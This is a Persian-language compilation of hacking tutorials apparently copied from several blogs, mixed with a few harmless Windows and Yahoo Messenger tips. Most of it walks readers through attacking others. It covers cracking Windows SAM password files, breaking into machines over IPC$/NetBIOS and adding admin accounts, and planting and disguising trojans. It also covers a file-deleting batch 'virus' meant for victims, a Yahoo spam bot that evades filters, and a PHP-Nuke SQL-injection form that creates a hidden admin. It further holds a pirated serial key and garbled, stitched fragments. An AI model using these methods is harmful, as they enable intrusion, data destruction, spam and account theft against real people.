با این کار عملا استفاده از صفحه کلید ممکن نیست. این کار باعث می شود که هنگامی که دکمه ای از صفحه کلید را فشار دهید صدای بوقی(beep ) شنیده شود و مانیتور چشمک بزند. به دو مسیر زیر به رجیستری ویندوز بروید.

مسیر1:
HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard\ Response نوع: String Value نام: Flags مقدار: 127

مسیر2:HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry
نام : Flags
مقدار: 3
نام:
WindosEffect

مقدار:3
نوع:
String Value

 

اطلاعات مفیدی از سیستم بدست بیارید،

شما با استفاده از Command Prompt میتونید اطلاعات مفیدی از سیستم بدستبیارید).برای این کار در Command دستور ’systeminfo’ را وارد کنید.اما شاید بخواید یه کپی ازاین اطلاعات ذخیره داشته باشید.برای این کار هم دستور’systeminfo > info.txt’ را وارد کنید.در این صورت این اطلاعات در قالب یک فایل txt (با نام info ) در C:\Documents and Sentting\your user قرار میگیرد.(C=درایو ویندوز)

 

چگونه می توان فهمید مه فرد مورد نظر در کدام روم است؟

برای این کار در هنگام چت کردن باید در صفحه اصلی که لیست دوستان وجود دارد روی message در بالای مسنجر کلیک کنید حالا به منوی بهمث بروید و گزینه to user chat go را انتخاب کنید صحفه ای ظاهر می شود دارای دو بخش روی قسمت دوم کلیک کرده و id شخص مورد نظر را بنویسید و ok کنید حالا اگر online بود و در چت روم بود وارد روم ان می شود اما اگر online نبود یا داخل روم نباشد این پیغام را می دهد : user is not in chat room

 

مخفی کردن یک فولدرها به طوری که در Search ویندوز دیده نشود

برای این کار روی فولدر مورد نظر کلیک راست کرده گزینه Rename را زده و کلید Alt را پایین نگه دارید بعد تایپ کنید 255 و Enter کنید دوباره کلیک راست کرده و Properties را زده تب Customize دکمه Change icon را زده و از بین آیکون ها روی جای خالی کلیک کنید(دو خانه بعد از آیکون درخت )و ok کنید .( اگر آیکون ها زیر خط دار هستند آنها را از این حالت خارج کنید برای این کار My computer منوی Tools / folder option را زده و از پایین گزینه دوم را انتخاب کنید)

 

restart کردن ویندوز بدون بوت کردن سیستم

همان طور که میدانید پس از نصب بعضی از برنامه ها شما باید ویندوز را Restart کنید.یعنی باید کامپیوتر را از نو بوت کنید.که این کار در بعضی از مواقع خیلی خسته کننده است.ولی شما میتوانید از یک میان بر استفاده کنید و این کار را در کمتر از 4 ثانیه انجام دهید. Restartکردن ویندوز بدون بوت کردن کامپیوتر در ویندوز x9 و ویندوز ME: برای اینکه از این میان بر ( در ویندوز x9 وME )استفاده کنید, پس از دیدن پیغام: You must restart your computer Yes No کلید No را کلیک کنید تا ویندوز شما Restart نشود.سپس کلیدهای CTRL+ALT+DELETE را با یک بار با هم فشار دهید. حالا از این کادر گزینه Explorer را روشن کنید و کلید End task را کلیک کنید.کادر محاوره ای Shut down ظاهر خواهد شد. در این کادر کلید Cancel را کلیک کنید. حالا اگر 4 ثانیه صبر کنید , پنجره ای با عنوان Explorer ظاهر خواهد شد. حالا اگر کلید End task را کلیک کنید , انگار گامپیوتر خود را Restart کرده اید. اگر خودتان این کار را انجام دهید میتوانید در کمتر از4 ثانیه کامپیوتر خود را Restart کنید ولی چون در حال حاضر شما در حال یاد گرفتن هستید اینقدر طول کشید

 

نمایش View Webcam در کنار ID بدون داشتن وب کم [آموزش , ]

قصد داریم تا ترفندی جالب را به شما معرفی کنیم که با استفاده از آن میتوانید عبارت View Webcam را در کنار Status خود در یاهو مسنجر به نمایش بگذارید ؛ در حالی که شما اصلا وب کمی ندارید که آنرا برای دوستانتان به نمایش بگذارید! 
 برای انجام ترفند :
پس از لوگین شدن به یاهو مسنجر با استفاده از
ID خودتان ، از منوی Messenger به My Status رفته و New Status Message را انتخاب کنید.
سپس در آن عبارت
View Webcam را تایپ نمایید و یک Space بزنید. سپس کلید Alt را نگه داشته و عدد 0160 را تایپ کنید. باز هم کلید Alt را نگه داشته و عدد 0160 را تایپ کنید. برای آخرین بار کلید Alt را نگه داشته و عدد 0160 را تایپ کنید. سپس دکمه OK را زده و خارج شوید. از این پس عبارت View Webcam برای نمایش Webcam که اصلا وجود ندارد نمایش خواهد یافت.
در ضمن دقت کنید برای تایپ اعداد ، از کلیدهای سمت راست استفاده کنید.

منبع:nims.mihanblog.com

 

هک کردن پسورد

همون طور که میدونید هنگام نصب ویندوز شما میتونید username و password واسه ویندوز تعریف کنید.پسوردی که در ابتدا بسیار کاربردی به نظر میاد ولی از نظر امنیت در سطح بالایی نیست و به راحتی هک میشود. من روش هک کردن این پسورد رو به شما یاد میدم ولی لطفا در زمینه های مفید ازش استفاده کنید.

 

قبل از شروع باید مطلبی رو خدمتتون عرض کنم. در این مقاله من فاصله هایی رو که در بین فرمان ها باید گذاشته شود با " - " و back slash رو با " windows>system32 " " mkdir-temphack " " copy-logon.scr-temphack>logon.scr " "copy-cmd.exe-temphack>cmd.exe " "del-logon.scr " حالا میرسیم به قسمتی که باید پسورد رو عوض کنید. من در قالب یک مثال این مطلب رو توضیح میدم.مثلا شما میخواهید پسورد " username" admin رو (هرچی که هست)با پسورد " raoof" عوض کنید .در command prompt این فرمان رو در ادامه اجرا کنید: net-user-admin-raoof شما هر پسوردی که دوست دارید رو بجای raoof بذارید وقتی که پیغام موفقیت امیز بودن فرمان اجرا شده رو دیدید میتونید از محیط dos خارج شده و با پسورد خودتون وارد ویندوز بشید. اگر مشکلی در این زمینه داشتید مطرح کنید تا جواب بدم موفق باشید.

 

هک کردن پسوورد admin

کلا روش های زیادی برای پیدا کردن پسورد ادمین ویندوز های NT 2K & XP وجود داره اما من ترجیح می دم از روش کرک SaM پسورد را بدست بیارم متاسفانه بزرگ ترین ضعف امنیتی مایکروسافت در SaM بر می گرده به Encrypt این فایل هاکه با متد 64bit انکریپت و یا بهتره بگم Hash شده و این به کرکرها اجازه رو می ده که با یک مقدار دقت حتی بتونه به خوبی هارد دیسک هایی را که با Format NTFS قالب بندی شده و SaM فایل ها Encode شده اند رو Decode کنند!!

 

اما ما برای بدست آوردن فایل های SaM باید دو نوع فایل رو در نظر بگیریم
یکی
SaM Registry و دیگری System Registry که در هنگام عملیات کرک به این دو فایل مهم که در مسیرهای

CODE

c:\windows\system32\config\SAM


و

CODE

c:\windows\system32\config\system


می باشندنیاز داریم البته این دو فایل به طور کاملا پیچیده ای
Encode شده اند که اگر ما سیستم رو با ویندوز بالا بیاریم نمی توانیم این دو فایل رو از پوشه های بالا بدست بیاریم و حتما باید نیاز به سیستم عامل Dos و البته یک برنامه کمپرس گر که Dos رو پشتیبانی کنه داریم من برنامه کمپرس گر PK Zip 2.50 رو پیشنهاد می کنم !!!
[
url]http://garbo.uwasa.fi/pub/pc/arcers/pk250dos.exe[/url]
شما این برنامه رو دریافت کنید و اجرا کنید محتویات کمپرس گر
UnZip می شود کلیه فایل های UnZip شده را در یک فلاپی دیسک قرار دهید و فلاپی را بیرون بیاورید!

مرحله بعد:
خوب با سیستم
Dos بالا می آیم یا یک Startup دیسک فرقی نمی کنه مهم این هست که با Dos سیستم رو بوت کنیم!!
البته دقت کنید که اگر با
Startup می خواهید سیستم رو بالا بیاورید محتویات فایل MsConfig.sys حتما این موارد رو داشته باشد

CODE

DEVICE=himem.sys
dos = high, umb


چک کنید در دیسکت
Startup خود حتما فایل himem.sys باشد اگر نیست می توانید از اینجا دریافت کرده و به دیسک Startup اضافه کنید
Download himem.sys
[
url]http://www.techadvice.cc/files/s29k2/w98/Startup-Disk/himem.sys[/url]
ما با این کار ایمان پیدا می کنیم که اگر با دسکت
Startup سیستم رو بوت می کنیم حتما RAM بالاتر از 32MB رو پشتیبانی می کنه!!

حال وقتی سیستم رو با
Dos بوت کردید دیسکت کمپرس گر PkZip را داخل سیستم گذاشته و عبارت زیر را تایپ کنید!!

CODE

pkzip c:\Crack.zip c:\windows\system32\config\SAM c:\windows\system32\config\system


دقت کنید بین دو کلمه
Sam و C: یک جای خالی یا Space وارد کنید بعد Enter کنید!!

درواقع ما با این دستور دو فایل مهم
SaM Registry و System Registry رو در پوشه های بالا استخراج کرده و به صورت فشرده در درایو C با نام Crack.zip ایجاد کردیم!!
البته هنگام عمیات اجرا سیستم از ما کمک می خواهد مه عرض می کنم!
وقتی دستور بالا رو دادیم بعد از یک دقیقه سیستم خطای
command.com می ده شما باید دیسکت کمپرس گر را در آورده و دیسکت Startup رو بزنید و برای ادامه کلیدی را بزنید و سپس تمام !!
فایل
Crack.zip در درایو C ایجاد شد!!

حالا سیستم رو
Restart می کنیم و با ویندوز بالا می آوریم با Winzip فایل مورد نظر یعنی Crack.zip را در پوشه ای UnPack می کنیم حالا نیاز به یک کرکر قوی

یعنی برنامه
ProActive Windows Security Explorer داریم شما می توانید این برنامه رو از اینجا دریافت کنید!!
Download SaM Cracker
[
url]http://www.persianhacker.net/downloads/pafiledb.php?action=file&id=30[/url]

خوب این برنامه رو باز می کنیم در کادر وسط
Registry Files رو تیک می زنیم و دکمه Dump رو فشار می دهیم صفحه ای باز شده و از ما محل دو فایل Sam Registry و SystemRegistry به ترتیب در Browse پایین و بالا می خواهد مسیر دو فایل را از پوشه Unpack شده Crack.zip انتخاب کرده و در نهایت Dump رو یک بار دیگر می زنیم و پس از یک ساعت تمام!!
پسورد به نمایش در می آید!!!

من هیچ گونه مسولیتی در قبال این آموزش را به عهده نمی گیرم
در ادامه این مطلب به زودی نحوه بدست آوردن
SaM فایل ها برای سیستم هایی که هارد دیسکی دارند که درایوهایشان با فرمت NTFS قالب بندی شده اند رو می گم
یادم رفت یک چیزی رو بگم می تونیم از روش
Cain و البته کرکر قدرتمند LC5 استفاده کنیم منتها به علت .... بنده نتونستم LC5 کرک شده رو گیر بیارم و پولی بود

موفق باشید!!

منبع:forum.p30world.com

 

هک کردن یاهو و گذاشتن تبلیغ در آن

خزنده ی یاهو ، نام نرم افزاری تبلیغاتی است که با به اصطلاح خزندگی درون چت روم های یاهو ، به ارسال پیغام تبلیغاتی برای افراد حاضر در روم یا ذخیره ID های حاضر در آن می پردازد. این برنامه یک بانک اطلاعاتی دارد که شامل  ID هایی هست که شما با خزندگی درون روم ها جمع آوری کرده اید. با استفاده از همین برنامه می توانید پیغام تبلیغاتی خاصی را برای تمام ID هایی که درون بانک اطلاعتی وجود دارد بفرستید.
این برنامه ابتدا از شما تا حداکثر 10
ID و Password حقیقی مربوط به یاهو درخواست می کند که الزاما میبایست Password هر 10 ID یکسان باشد. سپس به سرور یاهو متصل شده و با ID و Password هایی که شما داده اید به اصطلاح Login کرده و آن IDها  را به حالت Online در می آورد.
در این حالت شما چند انتخاب دارید :
1- آغاز عملیات خزندگی در روم ها :
برای همین بخش چند حالت مختلف وجود دارد :
حالت جمع آوری
ID که در این حالت روبات های شما به درون روم هایی که شما انتخاب می کنید خزندگی می کنند و تمام ID هایی را که در چت روم هستند در بانک اطلاعاتی برنامه ذخیره می کنند.
حالت
Send to all در روم که در این حالت روبات های شما ID
ها را ذخیره نمی کنند بلکه تنها با ورود به روم های مختلف به افراد حاضر در روم ، پیغامی که شما نوشتید را می فرستند و از روم خارج شده و به روم بعدی می روند.
حالت دو گانه که در این حالت روبات های شما علاوه بر ذخیره کردن
ID های حاضر در روم ، به Send to all کردن پیغام تبلیغاتی شما درون روم نیز می پردازند.
لازم به ذکر است که به دلیل سیستم ضد
Spamming یاهو ، سیستم های خاصی برای بهبود کار طراحی شده است. یکی از این سیستم ها آزمایش ورود به روم برای هر کدام از روبات های Login شده است. به دلیل این که ممکن است ID هایی که شما Login کرده اید ، دچار مشکل باشند یا Lock شده باشند و توانایی ورود به روم ها را نداشته باشند ، در آغاز عملیات ، برنامه به آزمایش ID های شما برای ورود به روم ها می پردازد و بسته به تعداد ID های قابل ورود به روم ها ، فاصله ی زمانی بین ورود به روم ها و ترتیب آن ها را محاسبه کرده و عملیات را بر اساس همان محاسبات آغاز می کند.
در حالت پیش فرض ، لیست روم های موجود برای خزندگی روم های
Asia Global Chat است. در صورت تمایل می توانید با بازکردن فایل Rooms.txt درون Folder برنامه ، روم های دیگری را نیز به این شکل  وارد کنید.

 

مثلا :
(
Asia Global Chat:1-100
)
یعنی روم های
Asia Global Chat از شماره ی 1 تا 100 . شما نیز می توانید روم های دلخواه خود را به این شکل در فایل Rooms.txt اضافه کنید.
* این برنامه به طور میانگین در هر دقیقه 100-300
ID جمع آوری می کند.
2- عملیات
Send to all به تمام ID های موجود در بانک اطلاعاتی :
شما در این بخش می توانید پیغام تبلیغاتی خاصی را برای تمام
ID هایی که با عمل خزندگی جمع آوری کرده اید و درون بانک اطلاعتی موجود هستند بفرستید. امکان گزینش محدوده  خاص برای فرستادن پیغام ها نیز فراهم شده به طوری که می توانید به عنوان مثال محدوده ی بین ID شماره ی 1000 تا ID شماره ی 2000 را برای فرستادن
پیغام انتخاب کنید.
به دلیل سیستم هوشمند ضد
Spamming یاهو ، سیستمی خاصی طراحی گردیده تا از Block شدن پیغام ها توسط یاهو جلوگیری شود. به این ترتیب که پس فرستادن تعداد خاصی پیغام ، برای مدتی کوتاه ارسال پیغام ها به تعویق افتاده و سپس ادامه پیدا می کند. همچنین فاصله ی زمانی خاصی بین ارسال هر PM با PM بعد وجود دارد که از Block شدن آن جلوگیری می کند. این فاصله ی زمانی با تغییر تعداد روبات های Login شده تغییر می کند. یعنی برنامه با محاسبات خاصی بسته به تعداد ID های Login شده ، فاصله ی زمانی بین PM ها را طوری تعیین می کند که Block نشوند.
برای فریب دادن
یاهو هم ، ارسال PM ها به طور ترتیبی است. یعنی اگر قرار باشد 20 PM فرستاده شود ، اولین PM توسط اولین ID و دومین PM توسط دومین ID  و ....... ( اگر 10 ID را همزمان Login کرده باشید ) دهمین PM توسط دهمین ID  و یازدهمین PM توسط اولین ID ارسال می شود و همین روند تا پایان کار ادامه پیدا می کند. حال اگر تعداد ID های کمتری Login کرده باشید ، این ارسال ترتیبی بسته به تعداد ID ها تنظیم می گردد.
در صورت
Login شدن هر 10 ID ، سرعت ارسال PM ها در این حالت ، 100 PM در دقیقه است. یعنی هر 10 دقیقه 1000 پیغام تبلیغاتی فرستاده می شود.
انتخاب امکان پاسخگویی (
Answering Machine) یکی دیگر از امکانات برنامه است. در صورت فعال بودن این سیستم ، اگر هریک از افرادی که در چت روم حاضر هستند به روبات شما PM ارسال کنند ، روبات شما پاسخی را که از پیش شما تعیین کرده اید ، به آن شخص می دهد. این پاسخ می تواند به خودی خود یک پیغام تبلیغاتی باشد.

منبع:sajadhack2000.persianblog.ir

آموزش هک ویندوز 2000,xp,nt

 

یکی از مشکلات بزرگ ویندوز که در Service pack های ویندوز هم وجود داره IPC هست

حالا ما با استفاده از این روش کارمون را شروع میکنیم .

یکی از نرم افزار های مورد نیاز GFI:LANguard Security Scaner هست که بخاطر قدرت و کارایی این برنامه را پیشنهاد میکنم که فقط باید یکسری

تغییرات رو روی آن انجام بدین این برنامه را از سایت زیر داونلود کنید

http://www.kyzj.com/

Serial:6J7FF-OL03J-9OHQB-1Q0XZ-F7PLZKH5TY-K1GSN-7BT5F-78A0B-CSKYU

البته ورژن 3.3 هم هست ولی من ورژن 3.2 را پیشنهاد میکنم که در سایت بالا ورژن 3.2 وجود دارد و سریال بالا نیز مربوط به همین ورژن هست

حالا باید یکسری تغییرات در این برنامه بدیم .

1.
option را انتخاب کنید و به قسمت Scanning بروید و این شاخه را انتخاب کنید Configure ports و حالا در قسمت

Port number/range:1025

port desciription:network blackjacket

و حالا ADD PORT را بزنید .

در قسمت New scan باید یک Range ای پی رو اسکن کنید تا یک ای پی با مشخصات زیر پیدا شود

پرت های باز 1025,139 را داشته باشد .

IPC share نیز داشته باشد

حالا باید به این ای پی به صورت زیر کانکت شوید :

1.
در قسمت Run این جمله را وارد کنید CMD

2.
دستور زیر را وارد کنید :

Net use IpadressIPC$""/user:Administrator

اگر دستور زیر را دریافت کردین

Successfully The Command was completed

از ای پی مورد نظر Share گرفتین و در اختیار شماست اما در غیر اینصورت Share دارای پسوورد میباشد که من برای کرک کردن پسسوورد از این برنامه

استقاده میکنم :

PQWAK

که این برنامه رو از سایت Download.com دریافت کنید .

بعد از کرک از پسوورد بدست آمده اینگونه استفاده کنید

Net use ipadressIPC$ "password"/user:administrator

در صورتیکه میخواهید با Telnet کانکت شوید مراحل زیر را طی کنید .

در قسمت RUN تایپ کنید Regedit

به این آدرس بروید HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet NTLMàServer--1.0

حالا Value date این فایل رو به این جمله تغییر دهید : 1à2

در قسمت بعدی به RUN بروید و این دستور را تایپ کنید TELNET

دستور زیر را وارد کنید Telnet ipadress

در ادامه اگر از شما یوزر و پسوورد خواست یوزر را Administrator و پسسورد را خالی بگذارید

حالا احتیاج به ساختن یک یوزر برای خود دارید . این دستور را در ادامه وارد کنید :

Net user username password/add

حالا برای قرار دادن یوزر خود در گروه ادمین ها این دستور را وارد کنید

Net groups Administrators username/add

تمام شد شما به هدف خود رسیده اید اما من برای تازه کارها روش اول را پیشنهاد میکنم

ولی دوستان دیگر میتوانند از Telnet استفاده کنند

نکته : من هیچ مسئولیتی در مورد تغییر رجیستری نمیپذیرم اگر شما قادر به Edit رجیستری نیستید بهتره از آن یه Backup تهیه کنید یا

در نهایت از روش اول استفاده کنید .

 

ویروسی که شناسایی نمیشه [ویروس نویسی]

این ویروس قابلیتی که داره اینه که هیچ آنتی ویروسی نمی تونه در برابرش کاری کنه و بعد از ری استارت ویندوز فرمت میشه

برای ساختن این ویروس مراحل زیر رو انجام بدید

به نوت پد رفته و این عبارت رو بنویسید

del autotexec.bat
del config.sys
cd winnt
del system.ini
del win.ini
بعد اونو با فرمت
bat  سیو کنین و برای قربانی بفرستین

 

آیکون و پسوند تابلوی ترجان ها را به هر چی که دوست دارید [هک]

برای اینکار  2  راه موجود می باشد که من این  2  راه را برای شما میگم:

راه اول :

یک عدد فایل تروجان آماده کنید...

 

یه wordpad  باز کنید ( می تونید رو دسکتاپ راست کلیک کنید به new  برید و یه wordpad documernt  باز کنید .

فایل تروجان رو کپی کنید و توی  wordpad  پیست کنید یا میتونید فایل رو با ماوس بکشید و تو صفحه  word   رها کنید .

حال همون فایلی رو که تو word  گذاشتید را انتخاب کنید . یعنی روش تک کلیک کنید

بعد به edit  برید و بعد به package object  و روی برگه edit package  کلیک کنید حالا در پبجره باز شده به edit  برید و copy package  رو بزنید .

در آخر هم به یکی از فلودر ها یا درایوها برید راست کلیک کنید و paste  رو بزنید .

به همین آسونی فایل تروجان exe  یا هر اسم دیگری را میتونید بی نام و نشون کنید و علاوه بر اینکه ایکون فایل شبیه این بچه مثبتا میشه به همین راحتی هم پسوندشو لو نمی ده اصلا پسوندی در کار نیست .

راه دوم :

بر روی  فایل تروجانی کا آماده کرده اید راست کلیک کنید وگزینه    create shortcut  را بر گزینید . حالا یه فایل از همون تروجان با اسم  shortcut  درست شده است حالا بر روی   shortcut  آن راست کلیک کنید و گزینه Properties  را انتخاب کنید حال در پنجره باز شده جدید  در بالای آن  گزینه   shortcut  را انتخاب کنید و بعد بر روی گزینه change icon  کیک کنید و در پنجره باز شده  100  ، 200  تا آیکون ظاهر میشود حالا هر کدوم را که دوست دارید انتخاب کنید و یا می تونید با زدن گزینه browse  آیکنی که خود شما دارید را برگزینید .

منبع:mojehacker.blogfa.com

 

آموزش هک کردن سایت و وبلاگ (قسمت دوم)

اما ادامه مطلب جلسه قبل . بازهم یادآور می‌شوم که هیچگونه مسئولیتی درباره مطالب وبلاگ ندارم و وبلاگ فقط جنبه آموزشی داره!

 

خوب. در جلسه قبل با مقدماتی در زمینه هک سایت و وبلاگ آشنا شدیم. حالا می‌ریم سر اصل مطلب. بحث رو با روشهای هک وبلاگ شروع می‌کنیم و در جلسه بعد هم به روشهای هک سایت می‌پردازیم. چون یک مقدار روشهای متفاوتی رو باید بکار ببریم.

روشهای هک وبلاگ زیادند که به ترتیب به آنها اشاره می‌کنم:

 

1- روش ID

این روش روشیه که قبلا بیشتر کارایی داشت. در این روش باید ابتدا ID نویسنده وبلاگ را هک بکنی و بعد بری در سایت ارائه دهنده وبلاگ در قسمت فراموش کردن پسورد. یوزرنیم وبلاگ که همون اسم وبلاگه رو بنویسیم و بگیم پسورد رو برامون به نشانی ID که هک کردیم بفرسته!!!

این روش عملا شاید فقط در پرشین بلاگ کارایی داشته باشه چون مثلا در بلاگفا اطلاعات وبلاگ برای ایمیل خصوصی نویسنده وبلاگ فرستاده می‌شه که خواننده وبلاگ اونو نمی‌بینه!

2-

 

اصولا هک کردن وبلاگ سخت تر از هک کردن سایته . چراکه شما برای هک کردن وبلاگ خیلی وقتا باید اول سرویس ارائه دهنده وبلاگ را هک بکنید. اما در کل برای هک کردن وبلاگ باید از مفاهیم کلی شبکه و کار با نرم افزارهای , IP sniffer NMAP , Nessus سر در بیارید و بتوانید با Exploit ها که در قسمت اول به اونها اشاره کردم کار کنید.

خوب ما برای هک کردن یک وبلاگ باید سرور و یا سرویس دهنده ی آن را اول هک کنیم تا بتوانیم رمزها و یوزرنیم های وبلاگ یا وبلاگ های تحت سرویس آن سرور را پیدا کنیم معمولا یوزر نیم ها و یا همان آدرس وبلاگ مثل:

http://www.username.blogserver.com

که username آدرس و یوزر نیم وبلاگ است کد بندی نشده است و به راحتی پس از نفوذ به سرویس دهنده ی وبلاگ می توانیم آن را پیدا کنیم اما پسوردها معمولا کدبندی شده اند و ما باید با استفاده از ابزارهای کرک پسورد،آن پسوردها را از حالت کد شده خارج کنیم . از جمله این برنامه ها می‌تونینم به برنامه ی معروف کرک پسورد یا Password Cracker یا John the ripper یا L0pht crack و یا Palm crack

اشاره کنیم. که می توانید با جستجو در گوگل لینک دانلود آن ها را پیدا کنید و پس از دانلود از آن ها استفاده کنید که کار با آن ها بسیار آسان است بدین ترتیب که شما کلمه ی کد شده را به آن می دید و برنامه نسبت به اندازه ی ((Length)) آن شروع به شکست کد آن می نماید.

چگونه وارد سرور شویم؟

شما می توانید با پیدا کردن Vulnerability های یک سرویس دهنده ی وبلاگ به کمک برنامه های NAMP و یا Nessus و امتحان Exploit های نوشته شده برای آن آسیب پذیری ها ((Vulnerability)) به سیستم سرور نفوذ کرده و کنترل آن را در دست بگیرید البته فقط به قسمت اطلاعات سرور که معمولا دارای آسیب پذیری است نفوذ کنید.

3-

 

همانطور که گفتم با استفاده از نرم افزار هم می‌تونیم اینکار رو بکنیم. مثلا با استفاده از نرم افزار Sniffer می‌تونیم اینکار رو انجام بدیم..در اینترنت تعداد زیادی Sniffer وجود دارد که هریک کار خاصی را انجام می دهند البته این نکته را بگویم که آن ها خریدنی هستند و پس از مدتی از کار می افتند.ما برای این کار به IP Sniffer،Password Sniffer و Http Sniffer نیاز داریم.هنگامی که شما نرم افزارهای ذکر شده را دانلود کردید و اجرا کردید ( برای دانلود می‌تونید اونها رو در سایت های جستجو سرچ کنید)،باید یک آدرس آی پی در قسمت IP وارد کنید.این آی پی آدرس می تواند آی پی یک سرور وبلاگ یا هر صفحه ای که در آن رمز می زنند باشد. پس از این که آدرس آی پی را وارد کردید دکمه ی Listen را بزنید (اگر این دکمه نبود هر دکمه ای را که به نظر شما می تواند به آن آی پی آدرس وصل شود را بزنید) اکنون برنامه تمامی پاکت های اطلاعاتی را که در آن لحظه بین Server و Client ردو بدل می شود را برداشته و تمامی مشخصات و محتوای آن ها را نشان می دهد البته اگر کد شده نباشند ولی بیشتر اوقات فقط پسورد کد شده است و یوزر یم و بقیه ی مشخصات به طور واضح مشخص هستند.البته با این روش شما دیگر نمی تواند یک وبلاگ مشخص را هک کنید بلکه تنها وبلاگ هایی را که مدیر آن ها در آن لحظه Log in کرده را می توانید هک کنید. البته احتمال موفقیت در این روش کمتر از روش قبلی است.

 

نفوذ به سیستم از طریق NetBios

با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
خب بریم سره موضوع اصلی:
اول باید
IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \\IP\DriveName$
به جای
X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \\80.191.191.39\c$
اگه کمی شانس داشته باشید بدون در خواست
User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.

 

اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نویسنده : فرشاد عزیز)
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا (
Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال
۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک
۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.


<
form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form
>

خوب در قسمتی از کد نوشته شده:
http://www.sitename.com/admin.php
به جای
sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت :
exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن
Create Admin را کلیک کنید و مستقیما به http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!

منبع:aminlovehack.blogfa.com

 

آموزش هک کردن سایت

خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به
cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته!

 

..آموزش عزراییل جون رو بخونید در مورد نفوذ به سیستم از طریق نت بایوس (در انجمن هک و امنیت) و بعد ادامه ی این درس را بخونید.
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
